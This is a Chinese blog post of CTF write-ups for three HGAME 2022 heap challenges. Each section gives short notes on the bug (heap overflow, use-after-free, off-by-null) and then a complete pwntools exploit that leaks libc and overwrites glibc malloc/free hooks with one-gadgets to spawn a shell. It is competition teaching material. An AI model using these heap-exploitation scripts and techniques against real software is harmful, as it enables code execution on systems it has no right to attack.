PWN-COMPETITION-HGAME2022-Week3

最新推荐文章于 2024-07-17 23:48:55 发布
最新推荐文章于 2024-07-17 23:48:55 发布
阅读量2.6k 收藏
点赞数
分类专栏: Pwn-Competition 文章标签: 安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45582916/article/details/122784571
版权

PWN-COMPETITION-HGAME2022-Week3

changeable_note

edit_note中的gets函数存在堆溢出漏洞
本题没有leak函数,考虑利用_IO_2_1_stdout泄露libc
参考:好好说话之IO_FILE利用(1):利用_IO_2_1_stdout泄露libc(补题)HITCON 2018 PWN baby_tcache超详细讲解
参考文章中的题目libc版本为2.27,从tcache中分配chunk不会检查size域,可以很方便利用
本题的libc版本为2.23,从fastbin中分配chunk时会检查size域是否正确,故须小心选择各chunk大小

# -*- coding:utf-8 -*-
from pwn import *
from pwnlib.util.iters import mbruteforce
import itertools
import hashlib
context.log_level="debug"
io=process("./changeable_note")
#io=remote("chuj.top",52576)
elf=ELF("./changeable_note")
libc=ELF("./libc-2.23.so")

#gdb.attach(io)
#pause()

#io.recvuntil("sha256(????) == ")
#code=io.recvuntil("\n")[:-1]
#charset = string.printable
#proof = mbruteforce(lambda x: hashlib.sha256((x).encode()).hexdigest() == code, charset, 4, method='fixed')
#io.sendlineafter("????> ",proof)

def add(index,size,content):
	io.sendlineafter(">> ","1")
	io.sendlineafter("index?\n>> ",str(index))
	io.sendlineafter("size?\n>> ",str(size))
	io.sendafter("content?\n>> ",content)
def edit(index,content):
	io.sendlineafter(">> ","2")
	io.sendlineafter("index?\n>> ",str(index))# heap overflow
	io.send(content)
def free(index):
	io.sendlineafter(">> ","3")
	io.sendlineafter("index?\n>> ",str(index))

#pause()

add(0,0x90-8,"a"*8+"\n")#0
add(1,0x70,"a"*8+"\n")#1
add(2,0x60,"a"*8+"\n")#2
add(3,0x40,"a"*8+"\n")#3
add(4,0x10,"a"*8+"\n")#4
add(5,0x90-8,"a"*8+"\n")#5
add(6,0x70,"a"*8+"\n")#6

#pause()

size=0x90+0x20+0x50+0x70+0x80
print("size=="+hex(size))
payload="b"*0x10+p64(size)+p64(0x90)+"\n"
edit(4,payload)

#pause()

free(2)#2 out

#pause()

free(0)#0 out

#pause()

free(5)#5 out

#pause()

add(0,0x90+0x80-0x10,"c"*8+"\n")#0

#pause()

free(4)#4 out

#pause()

add(7,0x70+0x50-0x10,"\xdd\xb5")#7,找到一个地址比_IO_2_1_stdout低的,size域为0x7f的prev_size地址

#pause()

payload="d"*0x70+p64(0)+p8(0x71)+"\n"
edit(1,payload)#利用堆溢出调整chunk2的size域为0x71,使其能从fastbin中被取出

#pause()

add(2,0x60,"d"*8+"\n")#2

#pause()

payload=p64(0)*6+p8(0)*3+p64(0xFBAD1800)+p64(0)*3+"\x00"
add(4,0x60,payload)#4,这里是已经malloc过去了,可能pwngdb看不到p64(0)*3和"\x00"写过去了,但是确实是可以泄露libc的

#pause()

libc_base=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-0x3c5600
print("libc_base=="+hex(libc_base))
oggs=[0x45226,0x4527a,0xf03a4,0xf1247]
ogg=libc_base+oggs[1]
print("ogg=="+hex(ogg))
__malloc_hook=libc_base+libc.sym["__malloc_hook"]
print("__malloc_hook=="+hex(__malloc_hook))
realloc=libc_base+libc.sym["realloc"]
print("realloc=="+hex(realloc))

#pause()

add(5,0xb0-0x10,"e"*8+"\n")

#pause()

###########################################################################

add(8,0x90-8,"a"*8+"\n")#8
add(9,0x70,"a"*8+"\n")#9
add(10,0x60,"a"*8+"\n")#10
add(11,0x40,"a"*8+"\n")#11
add(12,0x20,"a"*8+"\n")#12
add(13,0x90-8,"a"*8+"\n")#13
add(14,0x70,"a"*8+"\n")#14

#pause()

size=0x90+0x30+0x50+0x70+0x80
print("size=="+hex(size))
payload="b"*0x20+p64(size)+p64(0x90)+"\n"
edit(12,payload)

#pause()

free(10)#10 out

#pause()

free(8)#8 out

#pause()

free(13)#13 out

#pause()

add(8,0x90+0x80-0x10,"c"*8+"\n")#8

#pause()

free(12)#12 out

#pause()

add(15,0x70+0x50-0x10,p64(__malloc_hook-0x23))#15,__malloc_hook头上的经典size域为0x7f的prev_size地址

#pause()

payload="d"*0x70+p64(0)+p8(0x71)+"\n"
edit(9,payload)#利用堆溢出调整chunk10的size域为0x71,使其能从fastbin中被取出

#pause()

add(10,0x60,"d"*8+"\n")#10

#pause()

payload=p8(0)*3+p64(0)+p64(ogg)+p64(realloc)
add(12,0x60,payload)#12,写__realloc_hook为one-gadget,__malloc_hook为realloc真实地址(调整栈帧)

#pause()

io.sendlineafter(">> ","1")
io.sendlineafter("index?\n>> ",str(16))
io.sendlineafter("size?\n>> ",str(0x10))

io.sendline("cat flag")

io.interactive()

elder_note

delete_note中存在UAF漏洞
首先利用unsorted bin泄露libc
然后通过double free覆盖__realloc_hook为one-gadget,__malloc_hook为realloc真实地址(调整栈帧)

# -*- coding:utf-8 -*-
from pwn import *
from pwnlib.util.iters import mbruteforce
import itertools
import hashlib
context.log_level="debug"
io=process("./elder_note")
#io=remote("chuj.top",52769)
elf=ELF("./elder_note")
libc=ELF("./libc-2.23.so")

#gdb.attach(io)
#pause()

#io.recvuntil("sha256(????) == ")
#code=io.recvuntil("\n")[:-1]
#charset = string.printable
#proof = mbruteforce(lambda x: hashlib.sha256((x).encode()).hexdigest() == code, charset, 4, method='fixed')
#io.sendlineafter("????> ",proof)

def add(index,size,content):
	io.sendlineafter(">> ","1")
	io.sendlineafter("index?\n>> ",str(index))
	io.sendlineafter("size?\n>> ",str(size))
	io.sendlineafter("content?\n>> ",content)
def show(index):
	io.sendlineafter(">> ","2")
	io.sendlineafter("index?\n>> ",str(index))
def free(index):
	io.sendlineafter(">> ","3")
	io.sendlineafter("index?\n>> ",str(index))

#pause()

add(0,0x100,"a"*8)
add(1,0x60,"b"*8)
add(2,0x60,"c"*8)
add(3,0x20,"/bin/sh\x00")

#pause()

free(0)

#pause()

show(0)
main_arena=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-88
print("main_arena=="+hex(main_arena))
__malloc_hook=main_arena-0x10
print("__malloc_hook=="+hex(__malloc_hook))
libc_base=__malloc_hook-libc.sym["__malloc_hook"]
print("libc_base=="+hex(libc_base))
__free_hook=libc_base+libc.sym["__free_hook"]
print("__free_hook=="+hex(__free_hook))
realloc=libc_base+libc.sym["realloc"]
print("realloc=="+hex(realloc))
oggs=[0x45226,0x4527a,0xf03a4,0xf1247]
ogg=libc_base+oggs[1]
print("ogg=="+hex(ogg))

#pause()

free(1)

#pause()

free(2)

#pause()

free(1)

#pause()

add(4,0x60,p64(__malloc_hook-0x23))

#pause()

add(5,0x60,"d"*8)

#pause()

add(6,0x60,"e"*8)

#pause()

add(7,0x60,p8(0)*3+p64(0)+p64(ogg)+p64(realloc))

#pause()

io.sendlineafter(">> ","1")
io.sendlineafter("index?\n>> ","8")
io.sendlineafter("size?\n>> ",str(0x10))

io.interactive()

sized_note

add和edit两个函数中都存在off by null漏洞
参考:2021第四届强网拟态PWN-wp 中old_school_revenge一题

# -*- coding:utf-8 -*-
from pwn import *
from pwnlib.util.iters import mbruteforce
import itertools
import hashlib
context.log_level="debug"
#io=process("./sized_note")
io=remote("chuj.top",52833)
elf=ELF("./sized_note")
libc=ELF("./libc.so.6")

#gdb.attach(io)
#pause()

io.recvuntil("sha256(????) == ")
code=io.recvuntil("\n")[:-1]
charset = string.printable
proof = mbruteforce(lambda x: hashlib.sha256((x).encode()).hexdigest() == code, charset, 4, method='fixed')
io.sendlineafter("????> ",proof)

def add(index,size,content):
	io.sendlineafter(">> ","1")
	io.sendlineafter("index?\n>> ",str(index))
	io.sendlineafter("size?\n>> ",str(size))
	io.sendafter("content?\n>> ",content)
def show(index):
	io.sendlineafter(">> ","2")
	io.sendlineafter("index?\n>> ",str(index))
def free(index):
	io.sendlineafter(">> ","3")
	io.sendlineafter("index?\n>> ",str(index))
def edit(index,content):
	io.sendlineafter(">> ","4")
	io.sendlineafter("index?\n>> ",str(index))
	io.send(content)

#pause()

for i in range(7):
	add(i,0xf8,"\n")

add(7,0xf8,"\n")
add(8,0xf8,"\n")
add(9,0xf8,"\n")
add(10,0xf8,"\n")

for i in range(7):
	free(i)

free(7)

#pause()

payload="\x00"*0xf0+p64(0x200)
edit(8,payload)

#pause()

free(9)

for i in range(7):
	add(i,0xf8,"\n")

#pause()

add(16,0xf8,"\n")
show(8)
libc_base=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-0x3EBCA0
print("libc_base=="+hex(libc_base))
__malloc_hook=libc_base+libc.sym["__malloc_hook"]
print("__malloc_hook=="+hex(__malloc_hook))
__free_hook=libc_base+libc.sym["__free_hook"]
print("__free_hook=="+hex(__free_hook))
realloc=libc_base+libc.sym["realloc"]
print("realloc=="+hex(realloc))
oggs=[0x4f3d5,0x4f432,0x10a41c]
ogg=libc_base+oggs[1]
print("ogg=="+hex(ogg))

#pause()

add(12,0x60,"\n")
free(12)

#pause()

edit(8,p64(__free_hook))

#pause()

add(13,0x60,"\n")
add(14,0x60,"\n")

#pause()

edit(14,p64(ogg))

#pause()

free(0)

io.sendline("cat flag")

io.interactive()
P1umH0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
REVERSE-COMPETITION-HGAME2022-Week3
P1umH0的博客
02-13 2461
REVERSE-COMPETITION-HGAME2022-Week3Answer's Windowscreakme3hardenedfishman Answer’s Windows 含有GUI的程序,ida打开,Shift+F12打开字符串窗口 发现"right"和"wrong" 对"right"查找交叉引用,来到sub_140002300函数 分析知道sub_140001F90是个变表base64,但是不知道变表 启调试,在如下图所示处下断,这里是生成变表的地方 调试时修改ZF标志位使程序能够执行i
2022 hgame pwn wp
weixin_45209963的博客
03-27 4688
2022 hgame pwn wp 本来早就写好了,但是由于复试毕设等等原因拖到今天才发 包括了绝大部分题目,除了算法题spfa和bpwn,剩下一些简单题懒得写了orz 文章目录2022 hgame pwn wpWeek 1enter_the_pwn_landenter_the_evil_pwn_landoldfashion_orwWeek 2oldfashion_noteechoWeek 3changeable_noteelder_notesized_noteWeek 4vector Week 1 ent
[HGAME 2022 week3]RSA attack 3(维纳攻击)
2302_80322812的博客
05-23 242
从题目中我们看出,e 非常大,且d很小只有64位(小于 n^(1/4)),故猜测使用维纳攻击破解。
hgame 2022 PWN 部分题目 Writeup
02-18 3338
hgame 2022 pwn 部分题目writeup
PWN-COMPETITION-HGAME2022-Week1
P1umH0的博客
01-28 1253
PWN-COMPETITION-HGAME2022Week1enter_the_pwn_landenter_the_evil_pwn_landoldfashion_orw(unsolved)ser_per_fa(unsol)test_your_nctest_your_gdb Week1 enter_the_pwn_land 栈溢出,需要注意的是下标 i 的地址比输入s的地址更高 s溢出会覆盖 i ,于是需要小心地覆写 i 的值,让循环顺利执行下去 然后就是常规的ret2libc # -*- coding:
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
PWN-COMPETITION-HGAME2022-Week2
P1umH0的博客
02-04 1792
PWN-COMPETITION-HGAME2022-Week2blind(unsolved)echo_severoldfashion_note blind(unsolved) echo_sever 堆上的格式化字符串漏洞 当输入的v0为0时,realloc(ptr,0)相当于free(ptr) 于是考虑将free_hook写为one-gadget # -*- coding:utf-8 -*- from pwn import * context.log_level="debug" io=process(".
2022年HGAME中CRYPTO的RSA Attack3
沐一 · 林 的博客
04-04 341
2022年HGAME中CRYPTO的RSA Attack3 . . 照例下载附件,照例先 CTF-RSA-tool 工具先行: . . 解毕! 敬礼!
python3使用mbruteforce报错
weixin_52118017的博客
10-21 533
mbruteforce
[RoarCTF2019]RSA
qq_61774705的博客
05-15 728
1.题目 # A=(((y%x)**5)%(x%y))**2019+y**316+(y+1)/x # p=next_prime(z*x*y) # q=next_prime(z) # A = 26833491826787145242474695127934760098610147810049249054841274803081613777681928680615618865770486464323821289608814874634274141761144868858306939594049897432
CTF实战分享 | Crypto-RSA
jennycisp的博客
11-22 919
此时e1在3, 7, 3 * 3, 3 * 7, 7 * 7, 3 * 3 * 7, 3 * 7 * 7, 7 * 7 * 7, 3 * 7 * 7 * 7, 3 * 3 * 7 * 7内取值。先gcd n1 n2 n3两两之间的共享素数然后直接Ф(n1),Ф(n2),Ф(n3),在然后mi=pow(ci,Ф(ni),ni)得到s,t后,求取M=m^gcd(e1, e2) = pow(c1, s, n) * pow(c2, t, n) % n。由于****c = (m ^ e) % n****。
NSS周常刷密码(1)
arcuied
05-22 667
NSS周常刷密码(1)
Evil-WinRM一键测试主机安全情况(KALI工具系列四十四)
LNN0212的博客
07-17 834
Kali Linux 是一个功能强大、多才多艺的 Linux 发行版 ,广泛用于网络安全社区。它具有全面的预安装工具和功能集,使其成为安全测试、数字取证、事件响应和恶意软件分析的有效平台。作为使用者,你可以把它理解为一个特殊的Linux 发行版 ,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计人员使用,也可称之为平台或者框架。注意,一定只能用于自己设备的连通性测试哦!
内容安全(深度行为检测技术、IPS、AV、入侵检测方法)
最新发布
Thewei666的博客
07-17 1086
区分不同的签名。
攻防世界pwn-forgot
08-10
- *2* *3* [攻防世界:PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

P1umH0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值